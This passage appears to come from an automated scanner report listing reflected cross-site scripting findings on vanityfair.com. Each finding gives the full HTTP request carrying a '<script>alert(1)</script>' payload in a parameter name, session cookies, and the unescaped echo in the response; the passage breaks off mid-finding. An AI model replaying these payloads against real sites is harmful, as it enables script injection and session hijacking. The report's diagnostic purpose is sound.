The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 846e2"><script>alert(1)</script>d952b19c0e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contributors/marnie-hanel?846e2"><script>alert(1)</script>d952b19c0e7=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:55:08 GMT Date: Mon, 29 Nov 2010 16:50:08 GMT Connection: close Connection: Transfer-Encoding Content-Length: 133243
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/contributors/marnie-hanel?printable=true&846e2"><script>alert(1)</script>d952b19c0e7=1" title="Print this page"> ...[SNIP]...
1.134. http://www.vanityfair.com/contributors/mike-ryan [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/contributors/mike-ryan
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e56b1"><script>alert(1)</script>6f8d0e02704 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contributors/mike-ryan?e56b1"><script>alert(1)</script>6f8d0e02704=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:55:07 GMT Date: Mon, 29 Nov 2010 16:50:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 129329
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/contributors/mike-ryan?printable=true&e56b1"><script>alert(1)</script>6f8d0e02704=1" title="Print this page"> ...[SNIP]...
1.135. http://www.vanityfair.com/contributors/sarah-ball [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/contributors/sarah-ball
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca22c"><script>alert(1)</script>8901a6d7aa6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contributors/sarah-ball?ca22c"><script>alert(1)</script>8901a6d7aa6=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:55:08 GMT Date: Mon, 29 Nov 2010 16:50:08 GMT Connection: close Connection: Transfer-Encoding Content-Length: 130145
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/contributors/sarah-ball?printable=true&ca22c"><script>alert(1)</script>8901a6d7aa6=1" title="Print this page"> ...[SNIP]...
1.136. http://www.vanityfair.com/culture/features/2010/10/sean-parker-201010 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/culture/features/2010/10/sean-parker-201010
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 930eb"><script>alert(1)</script>71eaac9a959 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/features/2010/10/sean-parker-201010?930eb"><script>alert(1)</script>71eaac9a959=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:42 GMT Date: Mon, 29 Nov 2010 16:47:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 109976
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/culture/features/2010/10/sean-parker-201010?printable=true&930eb"><script>alert(1)</script>71eaac9a959=1" title="Print this page"> ...[SNIP]...
1.137. http://www.vanityfair.com/culture/features/2010/11/basquiat-slide-show-201011 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87845"><script>alert(1)</script>316ea3f21d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/features/2010/11/basquiat-slide-show-201011?87845"><script>alert(1)</script>316ea3f21d6=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:41 GMT Date: Mon, 29 Nov 2010 16:47:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 109339
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/culture/features/2010/11/basquiat-slide-show-201011?printable=true&87845"><script>alert(1)</script>316ea3f21d6=1" title="Print this page"> ...[SNIP]...
1.138. http://www.vanityfair.com/culture/features/2010/11/james-hamilton-slide-show-201011 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e7d2"><script>alert(1)</script>d38e6bf6c97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/features/2010/11/james-hamilton-slide-show-201011?1e7d2"><script>alert(1)</script>d38e6bf6c97=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:40 GMT Date: Mon, 29 Nov 2010 16:47:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 109748
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/culture/features/2010/11/james-hamilton-slide-show-201011?printable=true&1e7d2"><script>alert(1)</script>d38e6bf6c97=1" title="Print this page"> ...[SNIP]...
1.139. http://www.vanityfair.com/culture/features/2010/11/joy-division-slide-show-201011 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52825"><script>alert(1)</script>22195c1cb8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/features/2010/11/joy-division-slide-show-201011?52825"><script>alert(1)</script>22195c1cb8e=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:37 GMT Date: Mon, 29 Nov 2010 16:47:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 112219
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/culture/features/2010/11/joy-division-slide-show-201011?printable=true&52825"><script>alert(1)</script>22195c1cb8e=1" title="Print this page"> ...[SNIP]...
1.140. http://www.vanityfair.com/culture/features/2010/11/kanye-201011 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/culture/features/2010/11/kanye-201011
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1057c"><script>alert(1)</script>c698c9c1472 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/features/2010/11/kanye-201011?1057c"><script>alert(1)</script>c698c9c1472=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:36 GMT Date: Mon, 29 Nov 2010 16:47:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 98739
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/culture/features/2010/11/kanye-201011?printable=true&1057c"><script>alert(1)</script>c698c9c1472=1" title="Print this page"> ...[SNIP]...
1.141. http://www.vanityfair.com/culture/features/2010/11/rolling-stones-slide-show-201011 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f71e3"><script>alert(1)</script>c8a15aac23e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/features/2010/11/rolling-stones-slide-show-201011?f71e3"><script>alert(1)</script>c8a15aac23e=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:36 GMT Date: Mon, 29 Nov 2010 16:47:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 110301
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/culture/features/2010/11/rolling-stones-slide-show-201011?printable=true&f71e3"><script>alert(1)</script>c8a15aac23e=1" title="Print this page"> ...[SNIP]...
1.142. http://www.vanityfair.com/culture/features/2010/11/thanksgiving-pilgrim-midterms-201011 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44431"><script>alert(1)</script>950a0f9ee4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/features/2010/11/thanksgiving-pilgrim-midterms-201011?44431"><script>alert(1)</script>950a0f9ee4e=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:36 GMT Date: Mon, 29 Nov 2010 16:47:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 99587
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/culture/features/2010/11/thanksgiving-pilgrim-midterms-201011?printable=true&44431"><script>alert(1)</script>950a0f9ee4e=1" title="Print this page"> ...[SNIP]...
1.143. http://www.vanityfair.com/culture/features/2010/12/npr-slide-show-201012 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/culture/features/2010/12/npr-slide-show-201012
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10547"><script>alert(1)</script>541fd455c87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/features/2010/12/npr-slide-show-201012?10547"><script>alert(1)</script>541fd455c87=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:34 GMT Date: Mon, 29 Nov 2010 16:47:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106141
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/culture/features/2010/12/npr-slide-show-201012?printable=true&10547"><script>alert(1)</script>541fd455c87=1" title="Print this page"> ...[SNIP]...
1.144. http://www.vanityfair.com/culture/features/2010/12/vanishing-blonde-201012 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/culture/features/2010/12/vanishing-blonde-201012
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 894e9"><script>alert(1)</script>90206af854f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/features/2010/12/vanishing-blonde-201012?894e9"><script>alert(1)</script>90206af854f=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:35 GMT Date: Mon, 29 Nov 2010 16:47:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106608
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/culture/features/2010/12/vanishing-blonde-201012?printable=true&894e9"><script>alert(1)</script>90206af854f=1" title="Print this page"> ...[SNIP]...
1.145. http://www.vanityfair.com/culture/features/2010/12/walters-201012 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/culture/features/2010/12/walters-201012
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b32ea"><script>alert(1)</script>6089bdb47d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/features/2010/12/walters-201012?b32ea"><script>alert(1)</script>6089bdb47d2=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
